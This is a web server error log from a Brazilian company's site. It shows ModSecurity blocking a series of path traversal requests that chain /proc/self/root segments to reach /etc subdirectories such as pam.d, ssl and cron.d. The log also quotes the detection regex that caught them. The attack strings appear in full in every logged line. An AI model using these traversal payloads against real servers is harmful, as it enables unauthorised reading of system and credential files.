[Tue Mar 17 09:07:48.459507 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.46:35866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEFKBJNF7axNlVR0X50wAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:49.868248 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.46:35880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEFaBJNF7axNlVR0X51gAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:51.151486 2026] [:error] [pid 1210:tid 140411708356352] [client 74.7.241.46:35886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEF1KJy4A1bGlmj9BSWwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:52.623283 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:35892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEGBePVOt35XCGZP8sdgAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:53.799144 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.241.46:35902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEGVKJy4A1bGlmj9BSXAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:55.102977 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:35916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEG9CmCSWTlPouqorH7gAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:56.319515 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.241.46:35928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEHJDEJR9VXonE_-1LVgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:58.098953 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.241.46:47834] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEHtCmCSWTlPouqorH8QAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:07:59.359161 2026] [:error] [pid 11469:tid 140411666392832] [client 74.7.241.46:47844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEH5DEJR9VXonE_-1LWgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:00.655041 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.241.46:47860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEINCmCSWTlPouqorH8gAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:03.399125 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.241.46:47870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEI3RXaaWotPICgYsiQQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:04.681858 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.241.46:47884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEJHRXaaWotPICgYsiQgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:05.902204 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.46:47900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEJaBJNF7axNlVR0X55QAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:07.251646 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:47910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEJ9CmCSWTlPouqorH9gAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:08.445221 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.241.46:58184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEKO82sZHvlq4xgHq_wwAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:09.768515 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:58190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEKQQohV2v-7oj5HH3oQAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:10.991072 2026] [:error] [pid 7000:tid 140411666392832] [client 74.7.241.46:58206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEKhePVOt35XCGZP8sjwAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:12.741236 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.241.46:58210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablELO82sZHvlq4xgHq_xQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:14.053271 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.241.46:58212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablELlKJy4A1bGlmj9BSYgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:15.260493 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.241.46:58226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEL9CmCSWTlPouqorH-gAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:15.450836 2026] [:error] [pid 2305:tid 140411699963648] [client 74.7.244.31:46086] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablELwQohV2v-7oj5HH3owAAAYU"]
[Tue Mar 17 09:08:16.576004 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:58230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEMNCmCSWTlPouqorH-wAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
